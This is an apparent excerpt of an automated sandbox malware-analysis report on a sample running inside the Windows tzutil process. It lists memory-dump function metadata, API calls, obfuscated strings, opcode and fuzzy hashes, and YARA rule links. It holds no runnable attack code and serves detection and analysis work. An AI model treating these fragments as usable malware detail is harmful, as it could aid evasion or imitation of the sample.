                                                                    • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                                    • Instruction ID: 54c54b6335f11c44e4f0de3a57ed3c034c1d503363f0af0606b3aca43fd89ad5
                                                                    • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                                    • Instruction Fuzzy Hash: DFF0653B6407103AE73166AC8C02FDBAB998F95B64F240119F619EF6C0D595B4058FB5
                                                                    Function 028D9A90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(028C1E59,?,028D5F17,028C1E59,?,028D5F17,?,028C1E59,028D59BF,00001000,?,00000000), ref: 028D9AC9
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                                    • Instruction ID: 955002d9bc263471eb8bf2a42814ffb5d4ce3c2d6378ee7d54a80d694efdc5f1
                                                                    • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                                    • Instruction Fuzzy Hash: F8E09A7A2002087BC614EF69DC40F9B77ADEFC9710F004408FA08E7240C631B9108BB9
                                                                    Function 028D9AD0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,028C4211,000000F4), ref: 028D9B09
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                                    • Instruction ID: 006d835cc96389e4d1fa108e6c9df8aec7338c9de84d0c5bf6bcc4850d0c9a7b
                                                                    • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                                    • Instruction Fuzzy Hash: 48E09A7A200304BBC624EF58DC41FAB77AEEFC9B10F004418F908AB341C630B8248BB5
                                                                    Function 028C8760 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 028C878A
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                                    • Instruction ID: 16449ee438f3e284c97290bdeff07606363647d7ef30b3b5bcab88a04bf5edbb
                                                                    • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                                    • Instruction Fuzzy Hash: 2DE0867D2802042BFF1466A89C45F6633584B88638F694A64BA1CDB2C2E774F5018654
                                                                    Function 028C8560 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,028C2150,028D82FF,?,028C211B), ref: 028C8591
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                                    • Instruction ID: 1f5c44db47f0b55c6a0b41ad016654d9ec142d4a8141015c12d38caf051b04a3
                                                                    • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                                    • Instruction Fuzzy Hash: 24D05E7A3803043BFA00A6E89C47F56328E8F08765F494068BA0CEB2C1EA65F5008976
                                                                    Function 031D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a0fb89806f683d1eb8a96087555528e3ba9d98c45cb40c9b58e538ab1d25e306
                                                                    • Instruction ID: ef8d444652e5178c3827649d44e8ecf3a355aa62d2a0d6aff787b2da276006d0
                                                                    • Opcode Fuzzy Hash: a0fb89806f683d1eb8a96087555528e3ba9d98c45cb40c9b58e538ab1d25e306
                                                                    • Instruction Fuzzy Hash: 74B09B719019C5C7DA15E7604708717790467D5701F29C561D2130641E4739C5D1E175

                                                                    Non-executed Functions

                                                                    Function 02FD04D0 Relevance: .1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3257753019.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2fd0000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                                    • Instruction ID: 17c39233d1f503ee3e5b5839fd3870be9c608ecfb55c235f468c4ba5016387b3
                                                                    • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                                    • Instruction Fuzzy Hash: 0441E371A18B0D4FD728AF6894817B6B3E3FB48340F54062DDA8AC3352EB74E8468685
                                                                    Function 02FDE0C9 Relevance: 56.5, Strings: 45, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3257753019.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2fd0000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                    • API String ID: 0-3558027158
                                                                    • Opcode ID: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                                    • Instruction ID: 81ee9f9d475c417c0d8da2c6de45ddfb22eeda6fb253d98e5f1ae168aa3d08d1
                                                                    • Opcode Fuzzy Hash: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                                    • Instruction Fuzzy Hash: C3A150F04482948AC7158F58A0552AFFFB1EBC6305F15816DE7E6BB243C3BE8909CB95
                                                                    Function 031D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 315ea817e17bd11d21384d9b16ca13cf80174533f9dc670a66cd22f20f279e05
                                                                    • Instruction ID: e6347a103b5e0fe8299d1988bd504311fe3f2475f92ad6ea62972d8e8a9192f4
                                                                    • Opcode Fuzzy Hash: 315ea817e17bd11d21384d9b16ca13cf80174533f9dc670a66cd22f20f279e05
                                                                    • Instruction Fuzzy Hash: 465127B6A00216BFCB24DB98C88097EFBF8BB0D2017548569E475D7641D374DE558BA0
                                                                    Function 03242410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: ce6bcc86342e1b16b4fbb398ae4be96ab16203c825a64b4bb29de58b0a8ae4e0
                                                                    • Instruction ID: f0d42c091ddcb8d257e2f34d246451f664633130b9361129264f55f671532a85
                                                                    • Opcode Fuzzy Hash: ce6bcc86342e1b16b4fbb398ae4be96ab16203c825a64b4bb29de58b0a8ae4e0
                                                                    • Instruction Fuzzy Hash: 9B51B569A10746AFCB28DB9EC89097FB7F9DF48201B088C59F4A5D7641D7B4DA808B60
                                                                    Function 031C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03204725
                                                                    • ExecuteOptions, xrefs: 032046A0
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03204742
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03204655
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 03204787
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032046FC
                                                                    • Execute=1, xrefs: 03204713
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: cccb7fd17ecfda079c280430d6669cbf600fb3070ab475ec4faf429649afa50b
                                                                    • Instruction ID: 83eb321082e8ebebe68c02783d21867b3b82d9f24cf98cb0964e902bdd991f5f
                                                                    • Opcode Fuzzy Hash: cccb7fd17ecfda079c280430d6669cbf600fb3070ab475ec4faf429649afa50b
                                                                    • Instruction Fuzzy Hash: FB51F935A103697FEF10EBA5DD89BADB3B8AF1C700F0401ADD515AB1D1DBB09A858F50
                                                                    Function 03266940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                    • Instruction ID: 2ad8851c752e1489e64a5f55d8981c85f147cce9a87ac5dfc10174780197d061
                                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                    • Instruction Fuzzy Hash: 96022475518341AFC304CF18C890A6FBBE5EFC8704F048A6DF9899B264DB75E985CB82
                                                                    Function 031DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction ID: 3a27628a9c27f8aa5024b2afe5a9f2d37e0b993f0b4ad60b0ee791790d35a62c
                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction Fuzzy Hash: D3818074E092499BDF28CE68C8917FEBBA5AF4E350F1EC259D852A73D0C7349880CB50
                                                                    Function 032420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: ace7e335bfdb2e06d03595ea7a39b79e4a35bdd6d564d9fe35f8a1257865b45a
                                                                    • Instruction ID: ca465fb6545419635d2b3365ad702c0af353f56b58880f6cc878eeebfdce1e49
                                                                    • Opcode Fuzzy Hash: ace7e335bfdb2e06d03595ea7a39b79e4a35bdd6d564d9fe35f8a1257865b45a
                                                                    • Instruction Fuzzy Hash: DB21567AA102199BDB14DF6AD8409AFB7E8AF48A40F080515F915E7201E771DA41CBA1
                                                                    Function 02FD3CBE Relevance: 8.8, Strings: 7, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3257753019.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2fd0000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                                    • API String ID: 0-1416458366
                                                                    • Opcode ID: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                                    • Instruction ID: 1a5c0053c3c3caf5c1e95774501ddf1ebc08f470e9e5a605cbe05754fa8210a2
                                                                    • Opcode Fuzzy Hash: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                                    • Instruction Fuzzy Hash: 7E31E2B091038CEBCF05CF94D5846DEBBB1FF04389F858559E81A6F250C771865ACB8A
                                                                    Function 031BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032002E7
                                                                    • RTL: Re-Waiting, xrefs: 0320031E
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032002BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: e5143cf9f5b975143a1fbca3a86df97011a1022bf6c84c27c24582b6aa8fa074
                                                                    • Instruction ID: db5d3de785891b7a58589f55bae0835e317533927b414473f04e6302102b05c5
                                                                    • Opcode Fuzzy Hash: e5143cf9f5b975143a1fbca3a86df97011a1022bf6c84c27c24582b6aa8fa074
                                                                    • Instruction Fuzzy Hash: 10E1DF346147429FD725CF28C884B6AB7F0BF89714F184A6DF4A58B2D1D774D88ACB42
                                                                    Function 031CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 03207BAC
                                                                    • RTL: Resource at %p, xrefs: 03207B8E
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03207B7F
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: 07188668027a9f496f792844e975af972679fea89aa0995a10af4bdadf8b9282
                                                                    • Instruction ID: 0c5ab904db874ff1c01ecd3073b8716044183eb206d57b9932ad3f638a132033
                                                                    • Opcode Fuzzy Hash: 07188668027a9f496f792844e975af972679fea89aa0995a10af4bdadf8b9282
                                                                    • Instruction Fuzzy Hash: 554122353187429FC724CE29C841B6AB7E5EF9C710F044A2DF85ADB780DB70E8458B91
                                                                    Function 031CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0320728C
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 032072C1
                                                                    • RTL: Resource at %p, xrefs: 032072A3
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03207294
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: fd65fba54d48f005470d6dcb863381b474546dbaa489d9b6df92482397e65acd
                                                                    • Instruction ID: d700e233a5673ff8b3534971219a31f53fe0588949b0e4c79011c3122f2f62c1
                                                                    • Opcode Fuzzy Hash: fd65fba54d48f005470d6dcb863381b474546dbaa489d9b6df92482397e65acd
                                                                    • Instruction Fuzzy Hash: 10411035618246AFC720CE28CC42B6AB7A5FF58710F144619F855EB281DB31F896CBD0
                                                                    Function 03242300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 72628cde6d088d830969532e77bbdd285542c6f7d0442b9025a7c5f79ab5e252
                                                                    • Instruction ID: e8197c330c19bc426e2d8ae47831e2216beefb3f9f0198b7ef6e77421b0c8c57
                                                                    • Opcode Fuzzy Hash: 72628cde6d088d830969532e77bbdd285542c6f7d0442b9025a7c5f79ab5e252
                                                                    • Instruction Fuzzy Hash: 63314376A10719DFCB24DF29DC40BAEB7B8EB44610F444955E859E7240EB309A848BA0
                                                                    Function 031D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction ID: e571c8a113a3ae55438582b04446b1124a4953f2e62edd2610200d7511d9cd38
                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction Fuzzy Hash: 0391D271E002169BDF34DE69C881ABEF7A5FF4E320F58461AE875EB2C4D73099818750
                                                                    Function 03199126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: b43dcfd720f30f74cb3d1ac2c12a4b751b7d85d4a3d9fe280fa58de3b9d3c722
                                                                    • Instruction ID: a2e550c54b1a7294cf3345efde63eafd8924de19dec2adf4f14242849a5d3596
                                                                    • Opcode Fuzzy Hash: b43dcfd720f30f74cb3d1ac2c12a4b751b7d85d4a3d9fe280fa58de3b9d3c722
                                                                    • Instruction Fuzzy Hash: 2D812875D002699BDB35DB54CC44BEEB7B8AF08710F0445EAEA19B7280E7309E85CFA0
                                                                    Function 0321CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0321CFBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8
                                                                    • String ID: @$@4Qw@4Qw
